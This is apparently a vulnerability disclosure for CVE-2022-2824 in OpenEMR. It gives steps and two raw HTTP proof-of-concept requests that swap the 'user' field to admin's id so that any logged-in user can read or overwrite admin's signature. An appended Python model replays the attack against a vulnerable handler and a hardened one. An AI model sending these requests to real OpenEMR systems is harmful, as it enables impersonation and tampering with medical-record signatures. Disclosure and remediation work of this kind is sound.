Headline
CVE-2022-2824: Any user can perform all actions on another user's signature (view, get, create, update, delete, ...) in openemr
Improper Access Control in GitHub repository openemr/openemr prior to 7.0.0.1.
Description
Any logged-in user can view another user's signature simply by changing the user parameter of the signature request to the other user's id; the server trusts the id supplied by the client instead of deriving it from the session. In the same way, the save-signature function lets a user create, update or delete another user's signature.
View/Get another user's signature:
1. Log in to an account (the receptionist account was used here).
2. Go to "Portal > Portal Audits > Home > Signature on File > Use Current" to view your own signature (create your signature first if you have not already). Intercept this request with Burp Suite.
3. Change the user parameter to another user's id (here admin's, whose user id is 5).
4. Send the request: admin's signature is returned in the response.
Create/Update/Delete another user's signature:
1. Log in to an account (the receptionist account was used here).
2. Go to "Portal > Portal Audits > Home > Signature on File > {Sign your signature} > Sign and Save" to create your own signature. Intercept this request with Burp Suite.
3. Change the user parameter to another user's id (here admin's, whose user id is 5).
4. Send the request.
5. Log in as admin: the signature you submitted is now stored as admin's signature.
Proof of Concept
View/Get another user's signature:
POST /openemr/portal/sign/lib/show-signature.php HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=HshnpRzk09lylHKsiGyGQrZDxOUlKlsI2bn-wO0t9g-n8P4h
Content-Length: 61
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Accept: application/json, text/plain, */*
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.openemr.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.openemr.io/openemr/portal/patient/provider
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"pid":"0","user":"5","is_portal":0,"type":"admin-signature"}
Create/Update/Delete another user's signature:
POST /openemr/portal/sign/lib/save-signature.php HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=HshnpRzk09lylHKsiGyGQrZDxOUlKlsI2bn-wO0t9g-n8P4h
Content-Length: 39622
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: application/json
Accept: */*
Origin: https://demo.openemr.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.openemr.io/openemr/portal/patient/provider
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"pid":"0","user":"5","is_portal":0,"signer":"Barbara Wallace","type":"admin-signature","output":"content of signature image in base64"}
Impact
Any authenticated user can read, create, update or delete any other user's signature, including admin's, because ownership is taken from the client-controlled user parameter. As a result, an attacker can replace or reuse the signature of admin or any other user and so impersonate them wherever that signature is applied.
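The root cause of the two procedures above is that show-signature.php and save-signature.php resolve the signature owner from the "user" field of the JSON body rather than from the logged-in session. The following Python model is an added example, not OpenEMR code: it reuses only the request shape from the proof of concept (pid, user, is_portal, type, output) and admin's user id 5, while the receptionist's user id 3, the in-memory store, the base64 placeholders and the exact authorization rule are assumptions made for the demonstration. It replays the PoC against a vulnerable handler that trusts the body and against a hardened handler that derives ownership from the session.

```python
"""Model of the access-control flaw behind CVE-2022-2824 (added example).

Not OpenEMR code: it mimics only the request shape of
portal/sign/lib/show-signature.php and save-signature.php
({"pid", "user", "is_portal", "type", "output"}) with an in-memory store
and a fake session. User id 5 (admin) comes from the report; user id 3 for
the receptionist, the store layout and the authorization rule are
assumptions made for the demonstration.
"""
from dataclasses import dataclass, field


@dataclass
class Session:
    """Identity fixed at login. Handlers must derive ownership from here,
    never from the JSON body, which the client fully controls."""
    user_id: int = 0        # staff/provider user id, 0 for portal patients
    pid: int = 0            # patient id when logged into the patient portal
    is_portal: bool = False


@dataclass
class SignatureStore:
    """(pid, user, type) -> base64 image, keyed on the request's own fields."""
    rows: dict = field(default_factory=dict)

    def get(self, pid, user, sig_type):
        return self.rows.get((pid, user, sig_type))

    def put(self, pid, user, sig_type, output):
        self.rows[(pid, user, sig_type)] = output

    def delete(self, pid, user, sig_type):
        return self.rows.pop((pid, user, sig_type), None) is not None


def client_ids(body):
    """Identifiers exactly as the client sent them (strings in the PoC).
    Using these for ownership is the vulnerable behaviour."""
    return int(body.get("pid", 0)), int(body.get("user", 0))


def authorized_ids(session, body):
    """Hardened rule (assumed, not OpenEMR's own policy): the signature owner
    is whoever is logged in. A staff session may only address its own user
    id; a portal session may only address its own pid and user 0. A mismatch
    means the body was tampered with, so it is rejected rather than silently
    corrected, which also keeps the attempt visible in logs.
    Returns (pid, user) when allowed, None otherwise."""
    pid, user = client_ids(body)
    if session.is_portal:
        ok = pid == session.pid and user == 0
    else:
        ok = user == session.user_id
    return (pid, user) if ok else None


def show_signature(session, body, store, hardened=True):
    """Model of show-signature.php. Returns an HTTP-like (status, payload)."""
    ids = authorized_ids(session, body) if hardened else client_ids(body)
    if ids is None:
        return 403, None
    return 200, store.get(*ids, body["type"])


def save_signature(session, body, store, hardened=True):
    """Model of save-signature.php (create/update)."""
    ids = authorized_ids(session, body) if hardened else client_ids(body)
    if ids is None:
        return 403, None
    store.put(*ids, body["type"], body["output"])
    return 200, "saved"


def replay_poc(hardened):
    """Replays the report's two requests as the receptionist (assumed user 3)
    against admin (user 5). Returns (leaked_signature, admin_signature_after)."""
    store = SignatureStore()
    store.put(0, 5, "admin-signature", "QURNSU4=")   # constructed: admin already signed
    receptionist = Session(user_id=3)
    view = {"pid": "0", "user": "5", "is_portal": 0, "type": "admin-signature"}
    save = dict(view, signer="Barbara Wallace", output="RVZJTA==")  # constructed image
    _, leaked = show_signature(receptionist, view, store, hardened)
    save_signature(receptionist, save, store, hardened)
    return leaked, store.get(0, 5, "admin-signature")


if __name__ == "__main__":
    print("vulnerable:", replay_poc(hardened=False))  # admin's signature leaked, then overwritten
    print("hardened:  ", replay_poc(hardened=True))   # both requests refused, admin's untouched
```

The hardened path deliberately rejects a mismatching id instead of overwriting it with the session value: silently substituting the session user would also close the hole, but a 403 on a tampered body leaves a trace that a detection rule can key on, whereas a silently corrected request looks like normal traffic.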
Occurrences